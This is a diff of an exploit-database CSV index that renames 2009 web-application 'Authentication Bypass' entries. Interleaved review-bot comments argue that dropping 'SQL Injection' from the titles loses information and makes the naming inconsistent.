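Review bot: the five renames in this hunk (7800 to 7803 and 7807) drop "SQL Injection" from the title entirely, so "eFAQ - (Authentication Bypass) SQL Injection" becomes "eFAQ - Authentication Bypass" and the row no longer says how the bypass is achieved. Anyone filtering the description column for "SQL Injection" will stop seeing these entries. Suggest a form that keeps the vulnerability class, such as "eFAQ - Authentication Bypass (SQL Injection)".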
@ -20520,7 +20523,7 @@ id,file,description,date,author,platform,type,port
|
|||
7814,platforms/php/webapps/7814.txt,"BibCiter 1.4 - Multiple SQL Injections",2009-01-16,nuclear,php,webapps,0
|
||||
7815,platforms/php/webapps/7815.txt,"Joomla! Component Gigcal 1.x - 'id' SQL Injection",2009-01-18,Lanti-Net,php,webapps,0
|
||||
7816,platforms/asp/webapps/7816.txt,"DS-IPN.NET Digital Sales IPN - Database Disclosure",2009-01-18,Moudi,asp,webapps,0
|
||||
7817,platforms/php/webapps/7817.txt,"Click&Email - (Authentication Bypass) SQL Injection",2009-01-18,SuB-ZeRo,php,webapps,0
|
||||
7817,platforms/php/webapps/7817.txt,"Click&Email - Authentication Bypass",2009-01-18,SuB-ZeRo,php,webapps,0
|
||||
7818,platforms/php/webapps/7818.txt,"SCMS 1 - 'index.php p' Local File Inclusion",2009-01-18,ahmadbady,php,webapps,0
|
||||
7819,platforms/php/webapps/7819.txt,"ESPG (Enhanced Simple PHP Gallery) 1.72 - File Disclosure",2009-01-18,bd0rk,php,webapps,0
|
||||
7820,platforms/php/webapps/7820.pl,"Fhimage 1.2.1 - Remote Index Change Exploit",2009-01-19,Osirys,php,webapps,0
|
||||
|
@ -20547,7 +20550,7 @@ id,file,description,date,author,platform,type,port
|
|||
7851,platforms/php/webapps/7851.php,"Pardal CMS 0.2.0 - Blind SQL Injection",2009-01-22,darkjoker,php,webapps,0
|
||||
7859,platforms/php/webapps/7859.pl,"MemHT Portal 4.0.1 - Remote Code Execution",2009-01-25,StAkeR,php,webapps,0
|
||||
7860,platforms/php/webapps/7860.php,"Mambo Component 'com_sim' 0.8 - Blind SQL Injection",2009-01-25,"Mehmet Ince",php,webapps,0
|
||||
7861,platforms/asp/webapps/7861.txt,"Web-Calendar Lite 1.0 - (Authentication Bypass) SQL Injection",2009-01-25,ByALBAYX,asp,webapps,0
|
||||
7861,platforms/asp/webapps/7861.txt,"Web-Calendar Lite 1.0 - Authentication Bypass",2009-01-25,ByALBAYX,asp,webapps,0
|
||||
7862,platforms/php/webapps/7862.txt,"Flax Article Manager 1.1 - 'cat_id' SQL Injection",2009-01-25,JIKO,php,webapps,0
|
||||
7863,platforms/php/webapps/7863.txt,"OpenGoo 1.1 - (script_class) Local File Inclusion",2009-01-25,fuzion,php,webapps,0
|
||||
7864,platforms/php/webapps/7864.py,"EPOLL SYSTEM 3.1 - (Password.dat) Disclosure",2009-01-25,Pouya_Server,php,webapps,0
|
||||
|
@ -20560,7 +20563,7 @@ id,file,description,date,author,platform,type,port
|
|||
7877,platforms/php/webapps/7877.txt,"Wazzum Dating Software - (userid) SQL Injection",2009-01-26,nuclear,php,webapps,0
|
||||
7878,platforms/php/webapps/7878.txt,"Groone's GLink ORGanizer - 'index.php cat' SQL Injection",2009-01-26,nuclear,php,webapps,0
|
||||
7879,platforms/php/webapps/7879.pl,"SiteXS 0.1.1 - (type) Local File Inclusion",2009-01-26,darkjoker,php,webapps,0
|
||||
7880,platforms/php/webapps/7880.txt,"ClickAuction - (Authentication Bypass) SQL Injection",2009-01-26,R3d-D3V!L,php,webapps,0
|
||||
7880,platforms/php/webapps/7880.txt,"ClickAuction - Authentication Bypass",2009-01-26,R3d-D3V!L,php,webapps,0
|
||||
7881,platforms/php/webapps/7881.txt,"Joomla! Component com_flashmagazinedeluxe - (mag_id) SQL Injection",2009-01-26,TurkGuvenligi,php,webapps,0
|
||||
7883,platforms/php/webapps/7883.txt,"OpenX 2.6.3 - (MAX_type) Local File Inclusion",2009-01-26,"Charlie Briggs",php,webapps,0
|
||||
7884,platforms/php/webapps/7884.txt,"Flax Article Manager 1.1 - Remote PHP Script Upload",2009-01-27,S.W.A.T.,php,webapps,0
|
||||
|
@ -20580,10 +20583,10 @@ id,file,description,date,author,platform,type,port
|
|||
7908,platforms/php/webapps/7908.txt,"Star Articles 6.0 - (admin.manage) Remote Contents Change",2009-01-29,ByALBAYX,php,webapps,0
|
||||
7909,platforms/php/webapps/7909.txt,"Coppermine Photo Gallery 1.4.19 - Remote File Upload",2009-01-29,"Michael Brooks",php,webapps,0
|
||||
7911,platforms/php/webapps/7911.txt,"GLPI 0.71.3 - Multiple SQL Injections Vulnerabilities",2009-01-29,Zigma,php,webapps,0
|
||||
7916,platforms/php/webapps/7916.txt,"Netartmedia Car Portal 1.0 - (Authentication Bypass) SQL Injection",2009-01-29,"Mehmet Ince",php,webapps,0
|
||||
7916,platforms/php/webapps/7916.txt,"Netartmedia Car Portal 1.0 - Authentication Bypass",2009-01-29,"Mehmet Ince",php,webapps,0
|
||||
7917,platforms/php/webapps/7917.php,"PLE CMS 1.0 Beta 4.2 - (login.php school) Blind SQL Injection",2009-01-29,darkjoker,php,webapps,0
|
||||
7922,platforms/php/webapps/7922.txt,"Pligg CMS 9.9.5 - Cross-Site Request Forgery / Protection Bypass / Captcha Bypass",2009-01-29,"Michael Brooks",php,webapps,0
|
||||
7924,platforms/asp/webapps/7924.txt,"SalesCart - (Authentication Bypass) SQL Injection",2009-01-30,ByALBAYX,asp,webapps,0
|
||||
7924,platforms/asp/webapps/7924.txt,"SalesCart - Authentication Bypass",2009-01-30,ByALBAYX,asp,webapps,0
|
||||
7925,platforms/php/webapps/7925.txt,"Revou Twitter Clone - Cross-Site Scripting / SQL Injection",2009-01-30,nuclear,php,webapps,0
|
||||
7927,platforms/php/webapps/7927.txt,"GNUBoard 4.31.04 - (09.01.30) Multiple Local+Remote Vulnerabilities",2009-01-30,make0day,php,webapps,0
|
||||
7930,platforms/php/webapps/7930.txt,"bpautosales 1.0.1 - Cross-Site Scripting / SQL Injection",2009-01-30,"Mehmet Ince",php,webapps,0
|
||||
|
@ -20593,8 +20596,8 @@ id,file,description,date,author,platform,type,port
|
|||
7936,platforms/php/webapps/7936.txt,"sma-db 0.3.12 - Remote File Inclusion / Cross-Site Scripting",2009-02-02,ahmadbady,php,webapps,0
|
||||
7938,platforms/php/webapps/7938.txt,"Flatnux 2009-01-27 - Cross-Site Scripting / Iframe Injection (PoC)",2009-02-02,"Alfons Luja",php,webapps,0
|
||||
7939,platforms/php/webapps/7939.txt,"AJA Portal 1.2 (Windows) - Local File Inclusion",2009-02-02,ahmadbady,php,webapps,0
|
||||
7940,platforms/php/webapps/7940.txt,"WholeHogSoftware Ware Support - (Authentication Bypass) SQL Injection",2009-02-02,ByALBAYX,php,webapps,0
|
||||
7941,platforms/php/webapps/7941.txt,"WholeHogSoftware Password Protect - (Authentication Bypass) SQL Injection",2009-02-02,ByALBAYX,php,webapps,0
|
||||
7940,platforms/php/webapps/7940.txt,"WholeHogSoftware Ware Support - Authentication Bypass",2009-02-02,ByALBAYX,php,webapps,0
|
||||
7941,platforms/php/webapps/7941.txt,"WholeHogSoftware Password Protect - Authentication Bypass",2009-02-02,ByALBAYX,php,webapps,0
|
||||
7944,platforms/php/webapps/7944.php,"phpBLASTER 1.0 RC1 - (blaster_user) Blind SQL Injection",2009-02-02,darkjoker,php,webapps,0
|
||||
7945,platforms/php/webapps/7945.php,"CMS Mini 0.2.2 - Remote Command Execution",2009-02-02,darkjoker,php,webapps,0
|
||||
7946,platforms/php/webapps/7946.txt,"sourdough 0.3.5 - Remote File Inclusion",2009-02-02,ahmadbady,php,webapps,0
|
||||
|
@ -20604,14 +20607,14 @@ id,file,description,date,author,platform,type,port
|
|||
18164,platforms/android/webapps/18164.php,"Google Android - 'content://' URI Multiple Information Disclosure Vulnerabilities",2011-11-28,"Thomas Cannon",android,webapps,0
|
||||
7951,platforms/php/webapps/7951.txt,"WholeHogSoftware Ware Support - Insecure Cookie Handling",2009-02-03,Stack,php,webapps,0
|
||||
7952,platforms/php/webapps/7952.txt,"WholeHogSoftware Password Protect - Insecure Cookie Handling",2009-02-03,Stack,php,webapps,0
|
||||
7953,platforms/php/webapps/7953.txt,"ClickCart 6.0 - (Authentication Bypass) SQL Injection",2009-02-03,R3d-D3V!L,php,webapps,0
|
||||
7953,platforms/php/webapps/7953.txt,"ClickCart 6.0 - Authentication Bypass",2009-02-03,R3d-D3V!L,php,webapps,0
|
||||
7954,platforms/php/webapps/7954.txt,"groone glinks 2.1 - Remote File Inclusion",2009-02-03,"k3vin mitnick",php,webapps,0
|
||||
7955,platforms/php/webapps/7955.txt,"groone's Guestbook 2.0 - Remote File Inclusion",2009-02-03,"k3vin mitnick",php,webapps,0
|
||||
7956,platforms/php/webapps/7956.txt,"Online Grades 3.2.4 - (Authentication Bypass) SQL Injection",2009-02-03,x0r,php,webapps,0
|
||||
7956,platforms/php/webapps/7956.txt,"Online Grades 3.2.4 - Authentication Bypass",2009-02-03,x0r,php,webapps,0
|
||||
7959,platforms/php/webapps/7959.txt,"Simple Machines Forum (SMF) - 'BBCode' Cookie Stealing",2009-02-03,Xianur0,php,webapps,0
|
||||
7960,platforms/php/webapps/7960.txt,"AJA Modules Rapidshare 1.0.0 - Arbitrary File Upload",2009-02-03,"Hussin X",php,webapps,0
|
||||
7961,platforms/php/webapps/7961.php,"WEBalbum 2.4b - (photo.php id) Blind SQL Injection",2009-02-03,"Mehmet Ince",php,webapps,0
|
||||
7963,platforms/asp/webapps/7963.txt,"MyDesing Sayac 2.0 - (Authentication Bypass) SQL Injection",2009-02-03,Kacak,asp,webapps,0
|
||||
7963,platforms/asp/webapps/7963.txt,"MyDesing Sayac 2.0 - Authentication Bypass",2009-02-03,Kacak,asp,webapps,0
|
||||
7964,platforms/php/webapps/7964.txt,"4Site CMS 2.6 - Multiple SQL Injections",2009-02-03,D.Mortalov,php,webapps,0
|
||||
7965,platforms/php/webapps/7965.txt,"technote 7.2 - Remote File Inclusion",2009-02-03,make0day,php,webapps,0
|
||||
7967,platforms/php/webapps/7967.pl,"TxtBlog 1.0 Alpha - Remote Command Execution",2009-02-03,Osirys,php,webapps,0
|
||||
|
@ -20660,9 +20663,9 @@ id,file,description,date,author,platform,type,port
|
|||
8030,platforms/php/webapps/8030.txt,"Papoo CMS 3.x - (pfadhier) Local File Inclusion",2009-02-10,SirGod,php,webapps,0
|
||||
8031,platforms/php/webapps/8031.pph,"q-news 2.0 - Remote Command Execution",2009-02-10,Fireshot,php,webapps,0
|
||||
8032,platforms/php/webapps/8032.txt,"Potato News 1.0.0 - (user) Local File Inclusion",2009-02-10,x0r,php,webapps,0
|
||||
8033,platforms/php/webapps/8033.txt,"AuthPhp 1.0 - (Authentication Bypass) SQL Injection",2009-02-10,x0r,php,webapps,0
|
||||
8034,platforms/php/webapps/8034.txt,"Mynews 0_10 - (Authentication Bypass) SQL Injection",2009-02-10,x0r,php,webapps,0
|
||||
8035,platforms/php/webapps/8035.txt,"BlueBird Pre-Release - (Authentication Bypass) SQL Injection",2009-02-10,x0r,php,webapps,0
|
||||
8033,platforms/php/webapps/8033.txt,"AuthPhp 1.0 - Authentication Bypass",2009-02-10,x0r,php,webapps,0
|
||||
8034,platforms/php/webapps/8034.txt,"Mynews 0_10 - Authentication Bypass",2009-02-10,x0r,php,webapps,0
|
||||
8035,platforms/php/webapps/8035.txt,"BlueBird Pre-Release - Authentication Bypass",2009-02-10,x0r,php,webapps,0
|
||||
8036,platforms/php/webapps/8036.pl,"Fluorine CMS 0.1 rc 1 - File Disclosure / SQL Injection / Command Execution",2009-02-10,Osirys,php,webapps,0
|
||||
8038,platforms/php/webapps/8038.py,"TYPO3 < 4.0.12/4.1.10/4.2.6 - (jumpUrl) Remote File Disclosure",2009-02-10,Lolek,php,webapps,0
|
||||
8039,platforms/php/webapps/8039.txt,"SkaDate Online 7 - Arbitrary File Upload",2009-02-11,ZoRLu,php,webapps,0
|
||||
|
@ -20688,7 +20691,7 @@ id,file,description,date,author,platform,type,port
|
|||
8065,platforms/asp/webapps/8065.txt,"SAS Hotel Management System - 'myhotel_info.asp' SQL Injection",2009-02-16,Darkb0x,asp,webapps,0
|
||||
8066,platforms/php/webapps/8066.txt,"YACS CMS 8.11 - update_trailer.php Remote File Inclusion",2009-02-16,ahmadbady,php,webapps,0
|
||||
8068,platforms/php/webapps/8068.txt,"ravennuke 2.3.0 - Multiple Vulnerabilities",2009-02-16,waraxe,php,webapps,0
|
||||
8069,platforms/php/webapps/8069.txt,"Grestul 1.x - Authentication Bypass (via Cookie SQL Injection)",2009-02-16,x0r,php,webapps,0
|
||||
8069,platforms/php/webapps/8069.txt,"Grestul 1.x - Authentication Bypass (Cookie SQL Injection)",2009-02-16,x0r,php,webapps,0
|
||||
8070,platforms/asp/webapps/8070.txt,"SAS Hotel Management System - Arbitrary File Upload",2009-02-17,ZoRLu,asp,webapps,0
|
||||
8071,platforms/php/webapps/8071.txt,"S-CMS 1.1 Stable - Insecure Cookie Handling / Mass Page Delete Vulnerabilities",2009-02-17,x0r,php,webapps,0
|
||||
8072,platforms/php/webapps/8072.txt,"pHNews Alpha 1 - 'header.php mod' SQL Injection",2009-02-17,x0r,php,webapps,0
|
||||
|
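Review bot: the 8069 rename only removes "via" and keeps "(Cookie SQL Injection)", but the other authentication-bypass rows touched by this commit (for example 8033, 8034 and 8035 in the preceding hunk) lose "SQL Injection" altogether. The two treatments should agree. Keeping the parenthesised class on all of them preserves more information than removing it here.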
@ -20707,10 +20710,10 @@ id,file,description,date,author,platform,type,port
|
|||
8095,platforms/php/webapps/8095.pl,"Pyrophobia 2.1.3.1 - Local File Inclusion Command Execution",2009-02-23,Osirys,php,webapps,0
|
||||
8098,platforms/php/webapps/8098.txt,"taifajobs 1.0 - (jobid) SQL Injection",2009-02-23,K-159,php,webapps,0
|
||||
8100,platforms/php/webapps/8100.pl,"MDPro Module My_eGallery - 'pid' SQL Injection",2009-02-23,StAkeR,php,webapps,0
|
||||
8101,platforms/php/webapps/8101.txt,"XGuestBook 2.0 - (Authentication Bypass) SQL Injection",2009-02-24,Fireshot,php,webapps,0
|
||||
8101,platforms/php/webapps/8101.txt,"XGuestBook 2.0 - Authentication Bypass",2009-02-24,Fireshot,php,webapps,0
|
||||
8104,platforms/php/webapps/8104.txt,"Qwerty CMS - 'id' SQL Injection",2009-02-24,b3,php,webapps,0
|
||||
8105,platforms/php/webapps/8105.txt,"pPIM 1.0 - Multiple Vulnerabilities",2009-02-25,"Justin Keane",php,webapps,0
|
||||
8107,platforms/asp/webapps/8107.txt,"PenPal 2.0 - (Authentication Bypass) SQL Injection",2009-02-25,ByALBAYX,asp,webapps,0
|
||||
8107,platforms/asp/webapps/8107.txt,"PenPal 2.0 - Authentication Bypass",2009-02-25,ByALBAYX,asp,webapps,0
|
||||
8109,platforms/asp/webapps/8109.txt,"SkyPortal Classifieds System 0.12 - Contents Change",2009-02-25,ByALBAYX,asp,webapps,0
|
||||
8110,platforms/asp/webapps/8110.txt,"SkyPortal Picture Manager 0.11 - Contents Change",2009-02-25,ByALBAYX,asp,webapps,0
|
||||
8111,platforms/asp/webapps/8111.txt,"SkyPortal WebLinks 0.12 - Contents Change",2009-02-25,ByALBAYX,asp,webapps,0
|
||||
|
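Review bot: Retitling 8101 and 8107 from "(Authentication Bypass) SQL Injection" to "Authentication Bypass" removes the vulnerability class from the description column, so a text search of this CSV for "SQL Injection" no longer returns either entry. Consider "Authentication Bypass (SQL Injection)" instead, which fixes the awkward leading parenthetical without discarding the root cause that triage and detection mapping rely on.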
@ -20718,7 +20721,7 @@ id,file,description,date,author,platform,type,port
|
|||
8113,platforms/asp/webapps/8113.txt,"DesignerfreeSolutions NewsLetter Manager Pro - Authentication Bypass",2009-02-26,ByALBAYX,asp,webapps,0
|
||||
8114,platforms/php/webapps/8114.txt,"Coppermine Photo Gallery 1.4.20 - (BBCode IMG) Privilege Escalation",2009-02-26,StAkeR,php,webapps,0
|
||||
8115,platforms/php/webapps/8115.pl,"Coppermine Photo Gallery 1.4.20 - (IMG) Privilege Escalation",2009-02-26,Inphex,php,webapps,0
|
||||
8116,platforms/php/webapps/8116.txt,"BannerManager 0.81 - (Authentication Bypass) SQL Injection",2009-02-26,rootzig,php,webapps,0
|
||||
8116,platforms/php/webapps/8116.txt,"BannerManager 0.81 - Authentication Bypass",2009-02-26,rootzig,php,webapps,0
|
||||
8120,platforms/asp/webapps/8120.txt,"SkyPortal Downloads Manager 1.1 - Remote Contents Change",2009-02-27,ByALBAYX,asp,webapps,0
|
||||
8123,platforms/php/webapps/8123.txt,"irokez blog 0.7.3.2 - Cross-Site Scripting / Remote File Inclusion / Blind SQL Injection",2009-02-27,Corwin,php,webapps,0
|
||||
8124,platforms/php/webapps/8124.txt,"Demium CMS 0.2.1b - Multiple Vulnerabilities",2009-02-27,Osirys,php,webapps,0
|
||||
|
@ -20793,7 +20796,7 @@ id,file,description,date,author,platform,type,port
|
|||
8290,platforms/php/webapps/8290.txt,"blogplus 1.0 - Multiple Local File Inclusion",2009-03-26,ahmadbady,php,webapps,0
|
||||
8291,platforms/php/webapps/8291.txt,"acute control panel 1.0.0 - SQL Injection / Remote File Inclusion",2009-03-26,SirGod,php,webapps,0
|
||||
8292,platforms/php/webapps/8292.txt,"Simply Classified 0.2 - (category_id) SQL Injection",2009-03-27,G4N0K,php,webapps,0
|
||||
8293,platforms/php/webapps/8293.txt,"Free PHP Petition Signing Script - (Authentication Bypass) SQL Injection",2009-03-27,Qabandi,php,webapps,0
|
||||
8293,platforms/php/webapps/8293.txt,"Free PHP Petition Signing Script - Authentication Bypass",2009-03-27,Qabandi,php,webapps,0
|
||||
8296,platforms/php/webapps/8296.txt,"Arcadwy Arcade Script - 'Username' Static Cross-Site Scripting",2009-03-27,"Anarchy Angel",php,webapps,0
|
||||
8297,platforms/php/webapps/8297.txt,"Moodle < 1.6.9/1.7.7/1.8.9/1.9.5 - File Disclosure",2009-03-27,"Christian J. Eibl",php,webapps,0
|
||||
8298,platforms/php/webapps/8298.pl,"My Simple Forum 7.1 - Remote Command Execution",2009-03-27,Osirys,php,webapps,0
|
||||
|
@ -20838,10 +20841,10 @@ id,file,description,date,author,platform,type,port
|
|||
8376,platforms/php/webapps/8376.php,"Geeklog 1.5.2 - SEC_authenticate() SQL Injection",2009-04-09,Nine:Situations:Group,php,webapps,0
|
||||
8377,platforms/asp/webapps/8377.pl,"Exjune Guestbook 2.0 - Remote Database Disclosure",2009-04-09,AlpHaNiX,asp,webapps,0
|
||||
8379,platforms/asp/webapps/8379.txt,"Back-End CMS 5.0 - (main.asp id) SQL Injection",2009-04-09,AnGeL25dZ,asp,webapps,0
|
||||
8380,platforms/php/webapps/8380.txt,"Simbas CMS 2.0 - (Authentication Bypass) SQL Injection",2009-04-09,"ThE g0bL!N",php,webapps,0
|
||||
8382,platforms/php/webapps/8382.txt,"WebFileExplorer 3.1 - (Authentication Bypass) SQL Injection",2009-04-09,Osirys,php,webapps,0
|
||||
8380,platforms/php/webapps/8380.txt,"Simbas CMS 2.0 - Authentication Bypass",2009-04-09,"ThE g0bL!N",php,webapps,0
|
||||
8382,platforms/php/webapps/8382.txt,"WebFileExplorer 3.1 - Authentication Bypass",2009-04-09,Osirys,php,webapps,0
|
||||
8383,platforms/php/webapps/8383.txt,"adaptbb 1.0b - Multiple Vulnerabilities",2009-04-09,"Salvatore Fresta",php,webapps,0
|
||||
8385,platforms/php/webapps/8385.txt,"My Dealer CMS 2.0 - (Authentication Bypass) SQL Injection",2009-04-09,"ThE g0bL!N",php,webapps,0
|
||||
8385,platforms/php/webapps/8385.txt,"My Dealer CMS 2.0 - Authentication Bypass",2009-04-09,"ThE g0bL!N",php,webapps,0
|
||||
8386,platforms/php/webapps/8386.txt,"Absolute Form Processor XE-V 1.5 - Authentication Bypass",2009-04-09,"ThE g0bL!N",php,webapps,0
|
||||
8387,platforms/php/webapps/8387.txt,"dynamic flash forum 1.0 Beta - Multiple Vulnerabilities",2009-04-09,"Salvatore Fresta",php,webapps,0
|
||||
8388,platforms/php/webapps/8388.txt,"PHP-Agenda 2.2.5 - Remote File Overwriting",2009-04-10,"Salvatore Fresta",php,webapps,0
|
||||
|
@ -20853,7 +20856,7 @@ id,file,description,date,author,platform,type,port
|
|||
8399,platforms/php/webapps/8399.pl,"Flatnuke 2.7.1 - (level) Privilege Escalation",2009-04-13,StAkeR,php,webapps,0
|
||||
8408,platforms/php/webapps/8408.txt,"X10media Mp3 Search Engine < 1.6.2 - Admin Access",2009-04-13,THUNDER,php,webapps,0
|
||||
8409,platforms/php/webapps/8409.txt,"Yellow Duck Weblog 2.1.0 - 'lang' Local File Inclusion",2009-04-13,ahmadbady,php,webapps,0
|
||||
8414,platforms/php/webapps/8414.txt,"XEngineSoft PMS/MGS/NM/Ams 1.0 - (Authentication Bypass) SQL Injection",2009-04-13,Dr-HTmL,php,webapps,0
|
||||
8414,platforms/php/webapps/8414.txt,"XEngineSoft PMS/MGS/NM/Ams 1.0 - Authentication Bypass",2009-04-13,Dr-HTmL,php,webapps,0
|
||||
8415,platforms/php/webapps/8415.txt,"FreznoShop 1.3.0 - 'id' SQL Injection",2009-04-13,NoGe,php,webapps,0
|
||||
8417,platforms/php/webapps/8417.txt,"e107 Plugin userjournals_menu - 'blog.id' SQL Injection",2009-04-13,boom3rang,php,webapps,0
|
||||
8418,platforms/php/webapps/8418.pl,"ASP Product Catalog 1.0 - (Cross-Site Scripting / File Disclosure) Multiple Remote Exploits",2009-04-13,AlpHaNiX,php,webapps,0
|
||||
|
@ -20874,7 +20877,7 @@ id,file,description,date,author,platform,type,port
|
|||
8443,platforms/php/webapps/8443.txt,"Job2C 4.2 - (adtype) Local File Inclusion",2009-04-15,ZoRLu,php,webapps,0
|
||||
8446,platforms/php/webapps/8446.txt,"FreeWebShop.org 2.2.9 RC2 - (lang_file) Local File Inclusion",2009-04-15,ahmadbady,php,webapps,0
|
||||
8448,platforms/php/webapps/8448.php,"Geeklog 1.5.2 - savepreferences()/*blocks[] SQL Injection",2009-04-16,Nine:Situations:Group,php,webapps,0
|
||||
8449,platforms/php/webapps/8449.txt,"NetHoteles 2.0/3.0 - (Authentication Bypass) SQL Injection",2009-04-16,Dns-Team,php,webapps,0
|
||||
8449,platforms/php/webapps/8449.txt,"NetHoteles 2.0/3.0 - Authentication Bypass",2009-04-16,Dns-Team,php,webapps,0
|
||||
8450,platforms/php/webapps/8450.txt,"Online Password Manager 4.1 - Insecure Cookie Handling",2009-04-16,ZoRLu,php,webapps,0
|
||||
8453,platforms/php/webapps/8453.txt,"webSPELL 4.2.0c - Bypass BBCode Cross-Site Scripting Cookie Stealing",2009-04-16,YEnH4ckEr,php,webapps,0
|
||||
8454,platforms/php/webapps/8454.txt,"DNS Tools (PHP Digger) - Remote Command Execution",2009-04-16,SirGod,php,webapps,0
|
||||
|
@ -20883,21 +20886,21 @@ id,file,description,date,author,platform,type,port
|
|||
8459,platforms/php/webapps/8459.htm,"eLitius 1.0 - (manage-admin.php) Add Admin/Change Password Exploit",2009-04-16,"ThE g0bL!N",php,webapps,0
|
||||
8460,platforms/php/webapps/8460.txt,"SMA-DB 0.3.13 - Multiple Remote File Inclusion",2009-04-16,JosS,php,webapps,0
|
||||
8461,platforms/php/webapps/8461.txt,"chCounter 3.1.3 - (Login Bypass) SQL Injection",2009-04-16,tmh,php,webapps,0
|
||||
8464,platforms/php/webapps/8464.txt,"Tiny Blogr 1.0.0 rc4 - (Authentication Bypass) SQL Injection",2009-04-17,"Salvatore Fresta",php,webapps,0
|
||||
8464,platforms/php/webapps/8464.txt,"Tiny Blogr 1.0.0 rc4 - Authentication Bypass",2009-04-17,"Salvatore Fresta",php,webapps,0
|
||||
8468,platforms/php/webapps/8468.txt,"Limbo CMS 1.0.4.2 - Cross-Site Request Forgery / Privilege Escalation (PoC)",2009-04-17,"Alfons Luja",php,webapps,0
|
||||
8471,platforms/php/webapps/8471.txt,"ClanTiger < 1.1.1 - Multiple Cookie Handling Vulnerabilities",2009-04-17,YEnH4ckEr,php,webapps,0
|
||||
8472,platforms/php/webapps/8472.txt,"ClanTiger 1.1.1 - (Authentication Bypass) SQL Injection",2009-04-17,YEnH4ckEr,php,webapps,0
|
||||
8472,platforms/php/webapps/8472.txt,"ClanTiger 1.1.1 - Authentication Bypass",2009-04-17,YEnH4ckEr,php,webapps,0
|
||||
8473,platforms/php/webapps/8473.pl,"ClanTiger 1.1.1 - (slug) Blind SQL Injection",2009-04-17,YEnH4ckEr,php,webapps,0
|
||||
8474,platforms/php/webapps/8474.txt,"e-cart.biz Shopping Cart - Arbitrary File Upload",2009-04-17,ahmadbady,php,webapps,0
|
||||
8475,platforms/php/webapps/8475.txt,"Esoftpro Online Guestbook Pro - (display) Blind SQL Injection",2009-04-17,"Hussin X",php,webapps,0
|
||||
8476,platforms/php/webapps/8476.txt,"Online Email Manager - Insecure Cookie Handling",2009-04-17,"Hussin X",php,webapps,0
|
||||
8477,platforms/php/webapps/8477.txt,"Hot Project 7.0 - (Authentication Bypass) SQL Injection",2009-04-17,HCOCA_MAN,php,webapps,0
|
||||
8477,platforms/php/webapps/8477.txt,"Hot Project 7.0 - Authentication Bypass",2009-04-17,HCOCA_MAN,php,webapps,0
|
||||
8480,platforms/php/webapps/8480.txt,"multi-lingual E-Commerce system 0.2 - Multiple Vulnerabilities",2009-04-20,"Salvatore Fresta",php,webapps,0
|
||||
8481,platforms/php/webapps/8481.txt,"Studio Lounge Address Book 2.5 - (profile) Arbitrary File Upload",2009-04-20,JosS,php,webapps,0
|
||||
8482,platforms/php/webapps/8482.txt,"Seditio CMS Events Plugin - (c) SQL Injection",2009-04-20,OoN_Boy,php,webapps,0
|
||||
8483,platforms/php/webapps/8483.txt,"Flatnux 2009-03-27 - Arbitrary File Upload / Information Disclosure",2009-04-20,girex,php,webapps,0
|
||||
8486,platforms/php/webapps/8486.txt,"webClassifieds 2005 - (Authentication Bypass) Insecure Cookie Handling",2009-04-20,"ThE g0bL!N",php,webapps,0
|
||||
8487,platforms/php/webapps/8487.txt,"EZ Webitor - (Authentication Bypass) SQL Injection",2009-04-20,snakespc,php,webapps,0
|
||||
8487,platforms/php/webapps/8487.txt,"EZ Webitor - Authentication Bypass",2009-04-20,snakespc,php,webapps,0
|
||||
8488,platforms/php/webapps/8488.pl,"Pligg CMS 9.9.0 - 'editlink.php' Blind SQL Injection",2009-04-20,"Rohit Bansal",php,webapps,0
|
||||
8491,platforms/php/webapps/8491.pl,"WysGui CMS 1.2b - (Insecure Cookie Handling) Blind SQL Injection",2009-04-20,YEnH4ckEr,php,webapps,0
|
||||
8492,platforms/php/webapps/8492.txt,"WB News 2.1.2 - Insecure Cookie Handling",2009-04-20,"ThE g0bL!N",php,webapps,0
|
||||
|
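Review bot: Two entries in this hunk still carry the leading-parenthetical form that the commit removes from their neighbours: 8461 "chCounter 3.1.3 - (Login Bypass) SQL Injection" and 8486 "webClassifieds 2005 - (Authentication Bypass) Insecure Cookie Handling". Either normalise them in the same pass (8461 also uses "Login Bypass" where every other title says "Authentication Bypass"), or state in the commit message that only the "(Authentication Bypass) SQL Injection" pattern is in scope.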
@ -20905,7 +20908,7 @@ id,file,description,date,author,platform,type,port
|
|||
8494,platforms/php/webapps/8494.txt,"TotalCalendar 2.4 - (inc_dir) Remote File Inclusion",2009-04-20,DarKdewiL,php,webapps,0
|
||||
8495,platforms/php/webapps/8495.pl,"e107 <= 0.7.15 - (extended_user_fields) Blind SQL Injection",2009-04-20,StAkeR,php,webapps,0
|
||||
8496,platforms/php/webapps/8496.htm,"TotalCalendar 2.4 - Remote Password Change Exploit",2009-04-20,"ThE g0bL!N",php,webapps,0
|
||||
8497,platforms/php/webapps/8497.txt,"Creasito E-Commerce 1.3.16 - (Authentication Bypass) SQL Injection",2009-04-20,"Salvatore Fresta",php,webapps,0
|
||||
8497,platforms/php/webapps/8497.txt,"Creasito E-Commerce 1.3.16 - Authentication Bypass",2009-04-20,"Salvatore Fresta",php,webapps,0
|
||||
8498,platforms/php/webapps/8498.txt,"eLitius 1.0 - Arbitrary Database Backup",2009-04-20,"ThE g0bL!N",php,webapps,0
|
||||
8499,platforms/php/webapps/8499.php,"Dokeos Lms 1.8.5 - (whoisonline.php) PHP Code Injection",2009-04-21,EgiX,php,webapps,0
|
||||
8501,platforms/php/webapps/8501.txt,"CRE Loaded 6.2 - (products_id) SQL Injection",2009-04-21,Player,php,webapps,0
|
||||
|
@ -20914,12 +20917,12 @@ id,file,description,date,author,platform,type,port
|
|||
8504,platforms/php/webapps/8504.txt,"NotFTP 1.3.1 - (newlang) Local File Inclusion",2009-04-21,Kacper,php,webapps,0
|
||||
8505,platforms/php/webapps/8505.txt,"Quick.CMS.Lite 0.5 - 'id' SQL Injection",2009-04-21,Player,php,webapps,0
|
||||
8506,platforms/php/webapps/8506.txt,"VS PANEL 7.3.6 - (Cat_ID) SQL Injection",2009-04-21,Player,php,webapps,0
|
||||
8508,platforms/php/webapps/8508.txt,"I-Rater Pro/Plantinum 4.0 - (Authentication Bypass) SQL Injection",2009-04-21,Hakxer,php,webapps,0
|
||||
8508,platforms/php/webapps/8508.txt,"I-Rater Pro/Plantinum 4.0 - Authentication Bypass",2009-04-21,Hakxer,php,webapps,0
|
||||
8509,platforms/php/webapps/8509.txt,"Studio Lounge Address Book 2.5 - Authentication Bypass",2009-04-21,"ThE g0bL!N",php,webapps,0
|
||||
8510,platforms/php/webapps/8510.txt,"mixedcms 1.0b - Local File Inclusion / Arbitrary File Upload / Authentication Bypass / File Disclosure",2009-04-21,YEnH4ckEr,php,webapps,0
|
||||
